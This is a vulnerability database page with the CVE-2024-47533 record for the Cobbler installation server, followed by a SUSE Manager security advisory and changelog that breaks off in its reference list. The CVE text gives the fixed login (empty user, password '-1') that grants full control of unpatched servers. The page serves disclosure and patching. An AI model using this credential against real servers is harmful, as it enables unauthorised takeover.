Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-47533 (GCVE-0-2024-47533)
Vulnerability from cvelistv5
Published
2024-11-18 16:33
Modified
2024-11-18 18:24
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-287 - Improper Authentication
Summary
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
References
Impacted products
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "cobbler",
"vendor": "cobbler_project",
"versions": [
{
"lessThan": "3.2.3",
"status": "affected",
"version": "3.0.0",
"versionType": "custom"
},
{
"lessThan": "3.3.7",
"status": "affected",
"version": "3.3.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-47533",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-18T18:21:42.523079Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-18T18:24:07.378Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "cobbler",
"vendor": "cobbler",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.2.3"
},
{
"status": "affected",
"version": "\u003e= 3.3.0, \u003c 3.3.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-18T16:33:55.229Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h"
},
{
"name": "https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0"
},
{
"name": "https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda"
}
],
"source": {
"advisory": "GHSA-m26c-fcgh-cp6h",
"discovery": "UNKNOWN"
},
"title": "Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-47533",
"datePublished": "2024-11-18T16:33:55.229Z",
"dateReserved": "2024-09-25T21:46:10.929Z",
"dateUpdated": "2024-11-18T18:24:07.378Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-47533\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-11-18T17:15:11.563\",\"lastModified\":\"2024-11-19T21:57:56.293\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.\"},{\"lang\":\"es\",\"value\":\"Cobbler, un servidor de instalaci\u00f3n de Linux que permite la configuraci\u00f3n r\u00e1pida de entornos de instalaci\u00f3n de red, tiene una vulnerabilidad de autenticaci\u00f3n incorrecta a partir de la versi\u00f3n 3.0.0 y anteriores a las versiones 3.2.3 y 3.3.7. `utils.get_shared_secret()` siempre devuelve `-1`, lo que permite que cualquiera se conecte a Cobbler XML-RPC como usuario `\u0027\u0027` contrase\u00f1a `-1` y realice cualquier cambio. Esto le da a cualquier persona con acceso de red a un servidor Cobbler control total del servidor. Las versiones 3.2.3 y 3.3.7 solucionan el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"}]}],\"references\":[{\"url\":\"https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-47533\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-18T18:21:42.523079Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:*\"], \"vendor\": \"cobbler_project\", \"product\": \"cobbler\", \"versions\": [{\"status\": \"affected\", \"version\": \"3.0.0\", \"lessThan\": \"3.2.3\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"3.3.0\", \"lessThan\": \"3.3.7\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-18T18:23:31.482Z\"}}], \"cna\": {\"title\": \"Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes\", \"source\": {\"advisory\": \"GHSA-m26c-fcgh-cp6h\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"cobbler\", \"product\": \"cobbler\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.0.0, \u003c 3.2.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.3.0, \u003c 3.3.7\"}]}], \"references\": [{\"url\": \"https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h\", \"name\": \"https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0\", \"name\": \"https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda\", \"name\": \"https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `\u0027\u0027` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-11-18T16:33:55.229Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-47533\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-11-18T18:24:07.378Z\", \"dateReserved\": \"2024-09-25T21:46:10.929Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-11-18T16:33:55.229Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
suse-su-2024:4006-1
Vulnerability from csaf_suse
Published
2024-11-18 13:19
Modified
2024-11-18 13:19
Summary
Security update for SUSE Manager Server 4.3
Notes
Title of the patch
Security update for SUSE Manager Server 4.3
Description of the patch
This update fixes the following issues:
cobbler:
- Security issues fixed:
* CVE-2024-47533: Prevent privilege escalation from none to admin (bsc#1231332)
- Other bugs fixed:
* Increase start timeout for cobblerd unit (bsc#1219450)
* Provide sync_single_system for DHCP modules to improve performance (bsc#1219450)
* Add input_string_*, input_boolean, input_int functions to public API
* Add new setting for Uyuni authentication endpoint (bsc#1219887)
grafana-formula:
- Version 0.11.0
* Add SLES 15 SP6 to supported versions (bsc#1228286)
inter-server-sync:
- Version 0.3.5-0
* Decode boolean values for export (bsc#1228545)
saltboot-formula:
- Update to version 0.1.1723628891.ffb1da5
* Rework request stop function to avoid unnecessary warnings
(bsc#1212985)
spacecmd:
- Version 4.3.29-0
* Speed up softwarechannel_removepackages (bsc#1227606)
spacewalk-backend:
- Version 4.3.30-0
* Make ISSv1 timezone independent (bsc#1221505)
* reposync: introduce timeout when syncing DEB channels (bsc#1225960)
* yum_src: use proper name variable name for subprocess.TimeoutExpired
* Check and populate PTF attributes at the time of importing
packages (bsc#1225619)
* reposync: import GPG keys to RPM DB individually (bsc#1217003)
* Add log string to the journal when services are stopped
because of insufficient disk space
spacewalk-certs-tools:
- Version 4.3.26-0
* Fix private key format in jabberd certificate file (bsc#1228851)
* Fix parsing Authority Key Identifier when keyid is not prefixed (bsc#1229079)
* Support multiple certificates for root-ca-file and server-cert-file
spacewalk-client-tools:
- Version 4.3.21-0
* Update translation strings
spacewalk-config:
- Version 4.3.14-0
* Trust the Content-Length header from AJP (bsc#1226439)
spacewalk-java:
- Version 4.3.82-0
* Limit frontend-log message size (bsc#1231900)
- Version 4.3.81-0
* Add detection of Ubuntu 24.04
- Version 4.3.80-0
* Use custom select instead of errata view for better performance
(bsc#1225619)
- Version 4.3.79-0
* Add info URL for cobbler to clean the system profile (bsc#1219645)
* Require correct scap packages for Ubuntu
* Require correct scap packages for Debian 12 (bsc#1227746)
* Fix finding system_checkin_threshold configuration value on Sytems
Overview page (bsc#1224108)
* Allow changing base channel to SUSE Liberty Linux LTSS when the system is on
Liberty (bsc#1228326)
* Implement product migration from RHEL and Clones to SUSE Liberty
Linux
* Remove system also from proxy SSH known_hosts (bsc#1228345)
* Fix NullPointerException when generating subscription matcher
input (bsc#1228638)
* Allow free products and SUSE Manager Proxy being managed by SUSE Manager
Server PAYG
* Open bootstrap script directory URL in a new page (bsc#1225603)
* Delay package list refresh when Salt was updated (bsc#1217978)
* Add SLE Micro 5 to the list of systems which support monitoring (bsc#1227334)
* Add all SLE Micro systems to the list of systems which get PTF repositories
* Update last sync refresh timestamp only when at least one time products
were synced before
* Prevent NullPointerException when listing history events without completion
time (bsc#1146701)
* Autoinstallation: prevent issues with duplicate IP address due to some
networks (bsc#1226461)
* Improve SQL queries and performance to check for PTF packages (bsc#1225619)
* Check the correct Salt package before product migration (bsc#1224209)
* Fix the date format output when using the HTTP API to use ISO 8601
format (bsc#1227543)
* Fix transactional update check for SL Micro (bsc#1227406)
* Improve score comparison in system search to fix ISE (bsc#1228412)
* Fix package profile update on CentOS 7 when yum-utils is not
installed (bsc#1227133)
spacewalk-utils:
- Version 4.3.22-0
* Add repositories for Ubuntu 24.04 LTS
- Version 4.3.21-0
* Drop unsupported tool spacewalk-final-archive as it is broken
and may disclose sensitive information (bsc#1228945)
spacewalk-web:
- Security issues fixed:
* Version 4.3.42-0
+ CVE-2024-49503: Escape organization credentials username to
mitigate XSS vulnerability (bsc#1231922)
* Version 4.3.41-0
+ CVE-2024-49502: Validate proxy hostname format and escape proxy
username to mitigate XSS vulnerabilities (bsc#1231852)
- Bugs fixed:
* Version 4.3.40-0
+ Fix channel selection using SSM (bsc#1226917)
+ Fix datetime selection when using maintenance windows (bsc#1228036)
susemanager:
- Version 4.3.39-0
* Enable bootstrapping for Ubuntu 24.04 LTS
- Version 4.3.38-0
* Add missing package python3-ply to bootstrap repo definition (bsc#1228130)
* Create special bootstrap data for SUSE Manager Server 4.3 with LTSS
updates for Hub scenario (bsc#1211899)
* Add LTSS updates to SUSE Manager Proxy 4.3 bootstrap data
* Add traditional stack to boostrap repo on sles15sp6 (bsc#1228147)
* Change package to libdbus-glib-1-2 on sle15sp6 (bsc#1228147)
susemanager-build-keys:
- Extended 2048 bit SUSE SLE 12, 15 GA-SP5 key until 2028. (bsc#1229339)
susemanager-docs_en:
- Documented Ubuntu 24.04 LTS as a supported client OS in Client
- SUSE Manager 4.3.14 documentation update
- In network ports section, deleted partially outdated image, added
port 443 for clients, and removed Cobbler only used internally
(bsc#1217338)
- Added installer-updates.suse.com to the list of URLs in Installation
and Upgrade Guide (bsc#1229178)
- Enhanced instructions about the permissions for the IAM role
in Public Cloud Guide
- Fixed OS minor number in Client Configuration Guide (bsc#1218090)
- Added warning about Package Hub (bsc#1221435)
- Removed Verify Packages section from Package Management chapter
in Client Configuration Guide
- Added note about usernames in PAM section in Administration Guide
(bsc#1227599)
- Updated Content Lifecycle Management (CLM) examples for Red Hat
Enterprise Linux 9 (bsc#1226687)
- Added VM based proxy installation in Installation and Upgrade Guide
- Fixed PostgreSQL name entity
- Improved Large Deployments Guide with better tuning values and
extra parameters added
- Updated lists of SUSE Linux Enterprise hardening profiles in openSCAP
chapter in the Administration Guide
susemanager-schema:
- Version 4.3.27-0
* Introduce new attributes to detect PTF packages (bsc#1225619)
susemanager-sls:
- Version 4.3.45-0
* Start using DEB822 format for repository sources beginning with Ubuntu 24.04
- Version 4.3.44-0
* Speed-up mgrutil.remove_ssh_known_host runner (bsc#1223312)
* Implement product migration from RHEL and clones to SUSE Liberty Linux
* Disable transactional-update.timer on SLEM at bootstrap
* Explicitly remove old venv-minion environment when updating Python versions
* sumautil: properly detect bridge interfaces (bsc#1226461)
* Fix typo on directories to clean up when deleting a system (bsc#1228101)
* Translate GPG URL if it has server name and client behind proxy
(bsc#1223988)
* Fix yum-utils package missing on CentOS7 minions (bsc#1227133)
* Implement IMDSv2 for AWS instance detection (bsc#1226090)
* Fix package profile update on CentOS 7 when yum-utils is not
installed (bsc#1227133)
* Fix parsing passwords with special characters for PostgreSQL
exporter
susemanager-sync-data:
- Version 4.3.21-0
* Add SLES15-SP5-LTSS channel families
* Add MicroOS PPC channel family
- Version 4.3.20-0
* Add Ubuntu 24.04 support
- Version 4.3.19-0
* Fix CentOS 7 repo urls (bsc#1227526)
* Add channel family for SLES 12 SP5 LTSS Extended Security
* Implement product migration from RHEL and clones to SUSE Liberty Linux
uyuni-common-libs:
- Version 4.3.11-0
* Enforce directory permissions at repo-sync when creating
directories (bsc#1229260)
* Make ISSv1 timezone independent (bsc#1221505)
uyuni-reportdb-schema:
- Version 4.3.11-0
* Change Errata CVE column to type text as a varchar reaches the
maximum (bsc#1226478)
How to apply this update:
1. Log in as root user to the SUSE Manager Server.
2. Stop the Spacewalk service:
`spacewalk-service stop`
3. Apply the patch using either zypper patch or YaST Online Update.
4. Start the Spacewalk service:
`spacewalk-service start`
Patchnames
SUSE-2024-4006,SUSE-SLE-Manager-Tools-15-2024-4006,SUSE-SLE-Manager-Tools-For-Micro-5-2024-4006,SUSE-SLE-Module-SUSE-Manager-Proxy-4.3-2024-4006,SUSE-SLE-Module-SUSE-Manager-Server-4.3-2024-4006
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for SUSE Manager Server 4.3",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\ncobbler:\n\n- Security issues fixed:\n\n * CVE-2024-47533: Prevent privilege escalation from none to admin (bsc#1231332)\n\n- Other bugs fixed:\n\n * Increase start timeout for cobblerd unit (bsc#1219450)\n * Provide sync_single_system for DHCP modules to improve performance (bsc#1219450)\n * Add input_string_*, input_boolean, input_int functions to public API\n * Add new setting for Uyuni authentication endpoint (bsc#1219887)\n\ngrafana-formula:\n\n- Version 0.11.0\n * Add SLES 15 SP6 to supported versions (bsc#1228286)\n\ninter-server-sync:\n\n- Version 0.3.5-0\n * Decode boolean values for export (bsc#1228545)\n\nsaltboot-formula:\n\n- Update to version 0.1.1723628891.ffb1da5\n * Rework request stop function to avoid unnecessary warnings\n (bsc#1212985)\n\nspacecmd:\n\n- Version 4.3.29-0\n * Speed up softwarechannel_removepackages (bsc#1227606)\n\nspacewalk-backend:\n\n- Version 4.3.30-0\n * Make ISSv1 timezone independent (bsc#1221505)\n * reposync: introduce timeout when syncing DEB channels (bsc#1225960)\n * yum_src: use proper name variable name for subprocess.TimeoutExpired\n * Check and populate PTF attributes at the time of importing\n packages (bsc#1225619)\n * reposync: import GPG keys to RPM DB individually (bsc#1217003)\n * Add log string to the journal when services are stopped\n because of insufficient disk space\n\nspacewalk-certs-tools:\n\n- Version 4.3.26-0\n * Fix private key format in jabberd certificate file (bsc#1228851)\n * Fix parsing Authority Key Identifier when keyid is not prefixed (bsc#1229079)\n * Support multiple certificates for root-ca-file and server-cert-file\n\nspacewalk-client-tools:\n\n- Version 4.3.21-0\n * Update translation strings\n\nspacewalk-config:\n\n- Version 4.3.14-0\n * Trust the Content-Length header from AJP (bsc#1226439)\n\nspacewalk-java:\n\n- Version 4.3.82-0\n * Limit frontend-log message size (bsc#1231900)\n- Version 4.3.81-0\n * Add detection of Ubuntu 24.04\n- Version 4.3.80-0\n * Use custom select instead of errata view for better performance\n (bsc#1225619)\n- Version 4.3.79-0\n * Add info URL for cobbler to clean the system profile (bsc#1219645)\n * Require correct scap packages for Ubuntu\n * Require correct scap packages for Debian 12 (bsc#1227746)\n * Fix finding system_checkin_threshold configuration value on Sytems\n Overview page (bsc#1224108)\n * Allow changing base channel to SUSE Liberty Linux LTSS when the system is on\n Liberty (bsc#1228326)\n * Implement product migration from RHEL and Clones to SUSE Liberty\n Linux\n * Remove system also from proxy SSH known_hosts (bsc#1228345)\n * Fix NullPointerException when generating subscription matcher\n input (bsc#1228638)\n * Allow free products and SUSE Manager Proxy being managed by SUSE Manager\n Server PAYG\n * Open bootstrap script directory URL in a new page (bsc#1225603)\n * Delay package list refresh when Salt was updated (bsc#1217978)\n * Add SLE Micro 5 to the list of systems which support monitoring (bsc#1227334)\n * Add all SLE Micro systems to the list of systems which get PTF repositories\n * Update last sync refresh timestamp only when at least one time products\n were synced before\n * Prevent NullPointerException when listing history events without completion\n time (bsc#1146701)\n * Autoinstallation: prevent issues with duplicate IP address due to some\n networks (bsc#1226461)\n * Improve SQL queries and performance to check for PTF packages (bsc#1225619)\n * Check the correct Salt package before product migration (bsc#1224209)\n * Fix the date format output when using the HTTP API to use ISO 8601\n format (bsc#1227543)\n * Fix transactional update check for SL Micro (bsc#1227406)\n * Improve score comparison in system search to fix ISE (bsc#1228412)\n * Fix package profile update on CentOS 7 when yum-utils is not\n installed (bsc#1227133)\n\nspacewalk-utils:\n\n- Version 4.3.22-0\n * Add repositories for Ubuntu 24.04 LTS\n- Version 4.3.21-0\n * Drop unsupported tool spacewalk-final-archive as it is broken\n and may disclose sensitive information (bsc#1228945)\n\nspacewalk-web:\n\n- Security issues fixed:\n\n * Version 4.3.42-0\n + CVE-2024-49503: Escape organization credentials username to\n mitigate XSS vulnerability (bsc#1231922) \n * Version 4.3.41-0\n + CVE-2024-49502: Validate proxy hostname format and escape proxy\n username to mitigate XSS vulnerabilities (bsc#1231852)\n\n- Bugs fixed:\n\n * Version 4.3.40-0\n + Fix channel selection using SSM (bsc#1226917)\n + Fix datetime selection when using maintenance windows (bsc#1228036)\n \nsusemanager:\n\n- Version 4.3.39-0\n * Enable bootstrapping for Ubuntu 24.04 LTS\n- Version 4.3.38-0\n * Add missing package python3-ply to bootstrap repo definition (bsc#1228130)\n * Create special bootstrap data for SUSE Manager Server 4.3 with LTSS\n updates for Hub scenario (bsc#1211899)\n * Add LTSS updates to SUSE Manager Proxy 4.3 bootstrap data\n * Add traditional stack to boostrap repo on sles15sp6 (bsc#1228147)\n * Change package to libdbus-glib-1-2 on sle15sp6 (bsc#1228147)\n\nsusemanager-build-keys:\n\n- Extended 2048 bit SUSE SLE 12, 15 GA-SP5 key until 2028. (bsc#1229339)\n\nsusemanager-docs_en:\n\n- Documented Ubuntu 24.04 LTS as a supported client OS in Client\n- SUSE Manager 4.3.14 documentation update\n- In network ports section, deleted partially outdated image, added\n port 443 for clients, and removed Cobbler only used internally\n (bsc#1217338)\n- Added installer-updates.suse.com to the list of URLs in Installation\n and Upgrade Guide (bsc#1229178)\n- Enhanced instructions about the permissions for the IAM role\n in Public Cloud Guide\n- Fixed OS minor number in Client Configuration Guide (bsc#1218090)\n- Added warning about Package Hub (bsc#1221435)\n- Removed Verify Packages section from Package Management chapter\n in Client Configuration Guide\n- Added note about usernames in PAM section in Administration Guide\n (bsc#1227599)\n- Updated Content Lifecycle Management (CLM) examples for Red Hat\n Enterprise Linux 9 (bsc#1226687)\n- Added VM based proxy installation in Installation and Upgrade Guide\n- Fixed PostgreSQL name entity\n- Improved Large Deployments Guide with better tuning values and\n extra parameters added\n- Updated lists of SUSE Linux Enterprise hardening profiles in openSCAP\n chapter in the Administration Guide\n\nsusemanager-schema:\n\n- Version 4.3.27-0\n * Introduce new attributes to detect PTF packages (bsc#1225619)\n\nsusemanager-sls:\n\n- Version 4.3.45-0\n * Start using DEB822 format for repository sources beginning with Ubuntu 24.04\n- Version 4.3.44-0\n * Speed-up mgrutil.remove_ssh_known_host runner (bsc#1223312)\n * Implement product migration from RHEL and clones to SUSE Liberty Linux\n * Disable transactional-update.timer on SLEM at bootstrap\n * Explicitly remove old venv-minion environment when updating Python versions\n * sumautil: properly detect bridge interfaces (bsc#1226461)\n * Fix typo on directories to clean up when deleting a system (bsc#1228101)\n * Translate GPG URL if it has server name and client behind proxy\n (bsc#1223988)\n * Fix yum-utils package missing on CentOS7 minions (bsc#1227133)\n * Implement IMDSv2 for AWS instance detection (bsc#1226090)\n * Fix package profile update on CentOS 7 when yum-utils is not\n installed (bsc#1227133)\n * Fix parsing passwords with special characters for PostgreSQL\n exporter\n\nsusemanager-sync-data:\n\n- Version 4.3.21-0\n * Add SLES15-SP5-LTSS channel families\n * Add MicroOS PPC channel family\n- Version 4.3.20-0\n * Add Ubuntu 24.04 support\n- Version 4.3.19-0\n * Fix CentOS 7 repo urls (bsc#1227526)\n * Add channel family for SLES 12 SP5 LTSS Extended Security\n * Implement product migration from RHEL and clones to SUSE Liberty Linux\n\nuyuni-common-libs:\n\n- Version 4.3.11-0\n * Enforce directory permissions at repo-sync when creating\n directories (bsc#1229260)\n * Make ISSv1 timezone independent (bsc#1221505)\n\nuyuni-reportdb-schema:\n\n- Version 4.3.11-0\n * Change Errata CVE column to type text as a varchar reaches the\n maximum (bsc#1226478)\n\nHow to apply this update:\n\n1. Log in as root user to the SUSE Manager Server.\n2. Stop the Spacewalk service:\n`spacewalk-service stop`\n3. Apply the patch using either zypper patch or YaST Online Update.\n4. Start the Spacewalk service:\n`spacewalk-service start`\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2024-4006,SUSE-SLE-Manager-Tools-15-2024-4006,SUSE-SLE-Manager-Tools-For-Micro-5-2024-4006,SUSE-SLE-Module-SUSE-Manager-Proxy-4.3-2024-4006,SUSE-SLE-Module-SUSE-Manager-Server-4.3-2024-4006",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_4006-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2024:4006-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20244006-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2024:4006-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019837.html"
},
{
"category": "self",
"summary": "SUSE Bug 1146701",
"url": "https://bugzilla.suse.com/1146701"
},
{
"category": "self",
"summary": "SUSE Bug 1211899",
"url": "https://bugzilla.suse.com/1211899"
},
{
"category": "self",
"summary": "SUSE Bug 1212985",
"url": "https://bugzilla.suse.com/1212985"
},
{
"category": "self",
"summary": "SUSE Bug 1217003",
"url": "https://bugzilla.suse.com/1217003"
},
{
"category": "self",
"summary": "SUSE Bug 1217338",
"url": "https://bugzilla.suse.com/1217338"
},
{
"category": "self",
"summary": "SUSE Bug 1217978",
"url": "https://bugzilla.suse.com/1217978"
},
{
"category": "self",
"summary": "SUSE Bug 1218090",
"url": "https://bugzilla.suse.com/1218090"
},
{
"category": "self",
"summary": "SUSE Bug 1219450",
"url": "https://bugzilla.suse.com/1219450"
},
{
"category": "self",
"summary": "SUSE Bug 1219645",
"url": "https://bugzilla.suse.com/1219645"
},
{
"category": "self",
"summary": "SUSE Bug 1219887",
"url": "https://bugzilla.suse.com/1219887"
},
{
"category": "self",
"summary": "SUSE Bug 1221435",
"url": "https://bugzilla.suse.com/1221435"
},
{
"category": "self",
"summary": "SUSE Bug 1221505",
"url": "https://bugzilla.suse.com/1221505"
},
{
"category": "self",
"summary": "SUSE Bug 1223312",
"url": "https://bugzilla.suse.com/1223312"
},
{
"category": "self",
"summary": "SUSE Bug 1223988",
"url": "https://bugzilla.suse.com/1223988"
},
{
"category": "self",
"summary": "SUSE Bug 1224108",
"url": "https://bugzilla.suse.com/1224108"
},
{
"category": "self",
"summary": "SUSE Bug 1224209",
"url": "https://bugzilla.suse.com/1224209"
},
{
"category": "self",
"summary": "SUSE Bug 1225603",
"url": "https://bugzilla.suse.com/1225603"
},
{
"category": "self",
"summary": "SUSE Bug 1225619",
"url": "https://bugzilla.suse.com/1225619"
},
{
"category": "self",
"summary": "SUSE Bug 1225960",
"url": "https://bugzilla.suse.com/1225960"
},
{
"category": "self",
